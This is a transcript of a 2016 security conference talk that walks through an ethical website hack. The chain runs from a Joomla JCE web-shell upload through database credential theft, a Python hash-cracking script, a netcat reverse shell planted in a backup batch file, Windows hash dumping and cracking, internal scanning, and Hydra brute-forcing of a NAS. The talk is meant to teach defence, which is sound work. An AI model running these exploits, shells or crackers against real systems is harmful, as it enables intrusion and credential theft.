Securious talk at the SWCSC event on 24th Feb 2016
TRANSCRIPT
www.securious.co.uk
Pete Woodward, PCI QSA | CISSP | MBCS | CEH
A look into Hacking Websites
Agenda
• What is a Hacker?
• Who Hacks?
• Why should we care?
• An Ethical Hack
What is a Hacker?
In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network.
Who Hacks?
Hackers fall into 3 categories:
• White Hat: breaks security for non-malicious reasons. The ‘Ethical Hacker’.
• Black Hat: violates computer security for little reason beyond maliciousness or personal gain. The ‘Criminal’.
• Grey Hat: lies between a black hat and a white hat; may hack systems for the sole purpose of notifying the administrator that their system has a security defect.
Why should we care?
Personal data put at risk in a breach such as the TalkTalk incident:
• Name
• Address
• Date of Birth
• Email Address
• Telephone number
• TalkTalk account information
• Credit Card details and/or bank account details
An Ethical Hack
Generally, the method behind most data breaches isn’t glamorous. Most involve basic stuff: bad passwords, insecure remote access, unpatched systems, default credentials, or a simple breakdown in the human data control chain.
It starts with Footprinting and Reconnaissance:
• Finding the company’s public and restricted websites
• Determining the operating system
• Collecting location information
• People search: social networking services
We then conduct Scanning:
• Check for LIVE systems (ICMP scanning)
• Ping sweep a range of IP addresses
• A response (ICMP Echo-Reply) indicates that a system is LIVE
• Fping is a useful automated tool that speeds up the scanning process
Note that firewalls and host stacks commonly drop ICMP echo requests, so the absence of a reply does not prove a host is down; on a local subnet an ARP sweep (which is what nmap -sn does there) is the more reliable check.
Next is Enumeration
• First REAL attack on target network
• Involves active connections to a system and directed
queries
• Attempt to identify network resources and shares
• Find Users, Groups, applications and passwords in
use
The Hack
Identified a target website, which happens to be running Joomla!
Copyright Dr Paul Dowland, Secure South West 6
Generated using https://www.shodan.io/
The Hack
Target a specific vulnerability within the JCE Joomla! extension and deploy a simple script. As the output shows, the script uploads a file with a .gif extension and then renames it to .php, leaving a web shell under images/stories that takes its command from the cmd parameter. This only works because the upload directory serves .php files as executable scripts; an upload directory needs to be writable by the web server, but never script-executable.
root@kali:~# perl jce.pl target.domain.org
.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.
|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||
[*] Checking Exploitability ...
[*] Trying to upload 0day.gif ...
[*] Trying to change extension from .gif to .php ...
[+] 0day.php was successfully uploaded
[+] Path: target.domain.org/images/stories/0day.php?cmd=id
The Hack
We can examine the file system, find the blog config and get the MySQL credentials. Note that the site connects to MySQL as root, with the password ‘root’:
/* Database Settings */
var $host = 'localhost';
var $user = 'root';
var $password = 'root';
var $db = 'blog';
var $dbprefix = 'jos_';
The Hack
Get the blog admin password. Older Joomla! versions (before 3.2, which moved to bcrypt) use a simple hashing mechanism:
md5(password + salt)
stored as hash:salt
fdb3d81d39d925c1332559d2ea53823e:Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
Write a simple script with a password list to crack the hash. The per-user salt stops shared precomputed tables, but a single MD5 per guess is cheap, so it does nothing to protect a weak password.
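The kind of simple cracking script the slide refers to, written here as an added example in Python; it is not the talk's own script. It parses a Joomla! hash:salt value, rehashes each wordlist candidate with that salt and stops at the first match. The salt, the password Summer2015 and the wordlist are constructed for the example and are not the values from the slide.

```python
import hashlib
from typing import Iterable, Optional, Tuple


def joomla_hash(password: str, salt: str) -> str:
    """Legacy Joomla! scheme (before 3.2): hex MD5 of password concatenated with salt."""
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def parse_stored(stored: str) -> Tuple[str, str]:
    """Split a jos_users.password value of the form <32 hex md5>:<salt>."""
    digest, sep, salt = stored.strip().partition(":")
    if sep != ":" or len(digest) != 32 or not salt:
        raise ValueError("expected md5hex:salt, got %r" % stored)
    int(digest, 16)  # raises ValueError if the digest is not hex
    return digest.lower(), salt


def crack_joomla(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose md5(candidate + salt) equals the stored digest.

    The salt is per user, so every candidate has to be rehashed for every
    target hash. That defeats shared precomputed tables, but it costs the
    attacker only one MD5 per guess, which is cheap.
    """
    digest, salt = parse_stored(stored)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")  # tolerate lines read straight from a file
        if joomla_hash(candidate, salt) == digest:
            return candidate
    return None


# Constructed sample (not the slide's hash): a made-up salt and a weak password,
# hashed the Joomla! way so the example runs offline.
SAMPLE_SALT = "Qh3xN7vLpWc2Rt9YbKdM0sFzE8uJaG1o"
SAMPLE_STORED = joomla_hash("Summer2015", SAMPLE_SALT) + ":" + SAMPLE_SALT
SAMPLE_WORDLIST = ["password", "123456", "letmein", "Summer2015", "Wizard1!"]

if __name__ == "__main__":
    print(crack_joomla(SAMPLE_STORED, SAMPLE_WORDLIST))
```

For a real wordlist, pass the open file object itself (for example `open("rockyou.txt", errors="ignore")`) as the iterable; the function strips line endings and stops at the first hit.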
The Hack
Launch a remote shell, ‘netcat’ for example.
The Hack
Escalate privileges. The batch file shown is an existing backup job (a mysqldump run) with a netcat line added at the end, pointing at a copy of nc dropped in the same images/stories directory as the web shell. Whatever runs this job runs it with its own account’s rights, so the cmd.exe it spawns inherits them; a script executed by a privileged job must never be writable by the web server account.
@echo Dumping blog
@"C:\Program Files (x86)\MySQL\MySQL Server 5.5\bin\mysqldump.exe" --user=%dbuser% --password=%dbpass% --databases blog --log-error="C:\Backup\dumperrors.txt" > "C:\Backup\blog.%backupdate%.sql"
START c:\inetpub\wwwroot\images\stories\nc x.x.x.y 80 -e cmd.exe
The Hack
Get Windows passwords. The third field reads NO PASSWORD because LM hashes are not stored on modern Windows by default; the fourth field is the NT hash, an unsalted MD4 of the UTF-16LE password:
>pwdump7
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
Administrator:500:NO PASSWORD*********************:47443E24FE435EB5210D91EF2838659D:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113DC10B1:::
hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79EB11EB:::
The Hack
Crack the password (ophcrack). Cracked in around 15 minutes, using a FREE tool! ophcrack works from precomputed rainbow tables, which is only possible because NT hashes carry no salt.
Via: http://ophcrack.sourceforge.net/
079F890A968B7F710A373ABB79EB11EB
Wizard1!
The Hack
Scan the INTERNAL network. On a local subnet nmap -sn discovers hosts by ARP, which is why each host comes back with a MAC address and vendor:
>nmap -sn 192.168.1.0/24
Starting Nmap 7.01 ( https://nmap.org )
MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate)
Nmap scan report for 192.168.1.50
Host is up (0.00s latency).
MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc)
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:6C:90 (Netgear)
Nmap scan report for 192.168.1.100
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:66:B4 (Netgear)
Nmap scan report for 192.168.1.101
Host is up (0.00s latency).
The Hack
Scan an INTERESTING host. Ports 139/445 (SMB) and 548 (AFP) alongside a web interface suggest network storage:
>nmap 192.168.1.200
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
Not shown: 1084 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open sunrpc
139/tcp open netbios-ssn
199/tcp open unknown
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afpovertcp
The Hack
Enumerate the shares:
>net view \\192.168.1.200
Shared resources at \\192.168.1.200

TEST-NAS_SECRET_Storage_01

Share name    Type  Used as  Comment
-----------------------------------------------
Applications  Disk           Applications share
DiskImages    Disk           Imaging Share
Media         Disk           Media Share
Projects      Disk           Projects share
Scratch       Disk           Scratch space
The command completed successfully.
The Hack
Access the network storage device by guessing its web login with Hydra (a password-guessing tool) and a 500-word list:
>hydra -l hackme -P top500.txt -s 443 192.168.1.200 https-get /shares/
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-07 23:16:06
[DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task
[DATA] attacking service http-get on port 443 with SSL
[443][http-get] host: 192.168.1.200 login: Admin password: letmeIN
The Hack
Enjoy…
>net use z: \\192.168.1.200\diskimages letmeIN /USER:Admin
The command completed successfully.
>dir z:
Volume in drive Z is DiskImages
Volume Serial Number is 3A5C-C2B8
Directory of Z:\
10/01/2016 15:00 <DIR> .
11/05/2015 22:01 <DIR> ..
04/11/2014 15:48 <DIR> Test Stuff
22/07/2015 22:02 <DIR> SECRET STUFF
17/10/2014 15:48 <DIR> Old Stuff
...
Any Questions?